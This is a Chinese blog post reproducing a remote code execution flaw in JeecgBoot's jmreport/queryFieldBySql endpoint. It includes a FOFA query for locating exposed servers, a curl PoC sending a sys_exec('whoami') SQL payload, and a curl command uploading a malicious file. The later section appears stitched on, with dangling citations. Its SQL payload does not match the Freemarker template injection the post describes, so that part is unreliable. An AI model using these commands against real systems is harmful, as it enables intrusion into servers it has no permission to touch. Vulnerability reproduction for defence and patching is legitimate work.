JeecgBoot jmreport/queryFieldBySql RCE漏洞复现

本文介绍了Jeecg Boot中jmreport/queryFieldBySql接口的Freemarker模板注入漏洞,该漏洞可能导致代码执行和敏感信息泄露。通过操纵模板引擎,攻击者可以对系统进行严重入侵。文章详细讲解了漏洞概述、复现环境,并提供了PoC,同时建议用户关注官方发布的修复程序以确保安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

Jeecg Boot(或者称为 Jeecg-Boot)是一款基于代码生成器的开源企业级快速开发平台,专注于开发后台管理系统、企业信息管理系统(MIS)等应用。它提供了一系列工具和模板,帮助开发者快速构建和部署现代化的 Web 应用程序。

0x02 漏洞概述

Jeecg Boot jmreport/queryFieldBySql接口存在Freemarker 模板注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。

0x03 复现环境

FOFA:

title=="JeecgBoot 企业级低代码平台" || body="window._CONFIG['imgDomainURL'] = 'http://localhost:8080/jeecg-boot/" || title="Jeecg-Boot 企业级快速开发平台" || title="Jeecg 快速开发平台" || body="'http://fileview.jeecg.com/onlinePreview'" || title=="JeecgBoot 企业级低代码平台" || title=="Jeecg-Boot 企业级快速开发平台"
### 关于Jeecg框架的远程代码执行(RCE漏洞 #### 漏洞概述 JeecgBoot 存在一个严重的安全漏洞,允许攻击者通过特定接口实现远程代码执行(RCE)[^1]。此漏洞被分配了CVE编号 CVE-2023-4450[^2]。 #### 影响范围 受影响版本包括但不限于 JeecgBoot 的多个发行版,在这些版本中存在的 `jmreport/queryFieldBySql` 接口未能正确处理用户输入的数据,从而导致SQL查询字段解析过程中存在表达式注入风险[^3]。 #### 利用条件 要成功触发该漏洞,需满足以下前提: - 目标服务器上运行着易受攻击版本的 JeecgBoot 平台; - 攻击者能够访问并调用 `/jmreport/queryFieldBySql` API 路径; - 输入参数未经过充分验证即用于动态 SQL 查询构建过程; #### PoC 实现细节 为了展示如何利用这个漏洞,下面给出了一种可能的方式来测试是否存在此类安全隐患。请注意,仅应在合法授权的情况下尝试复现实验环境中的漏洞。 ```bash curl -X POST "http://target-ip:port/jmreport/queryFieldBySql" \ -H "Content-Type: application/json;charset=UTF-8" \ -d '{"sql":"select * from (values((sys_exec(''whoami'')))) t(x)" }' ``` 上述命令向目标主机发送了一个恶意构造的 JSON 请求体,其中包含了嵌入式的操作系统命令执行函数调用(`sys_exec`)。如果服务端确实存在缺陷,则会返回当前用户的名称作为响应的一部分。 此外,还有更复杂的场景涉及到文件上传功能滥用的情况,例如可以通过如下方式将可执行文件放置到服务器本地磁盘位置: ```bash curl http://target-ip:port/path_to_upload_endpoint -F file=@/path/to/malicious_file ``` 这里假设路径 `/path_to_upload_endpoint` 是一个可以接受文件提交的服务地址,而 `-F file=@...` 表示附带待传输的实际二进制数据流。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值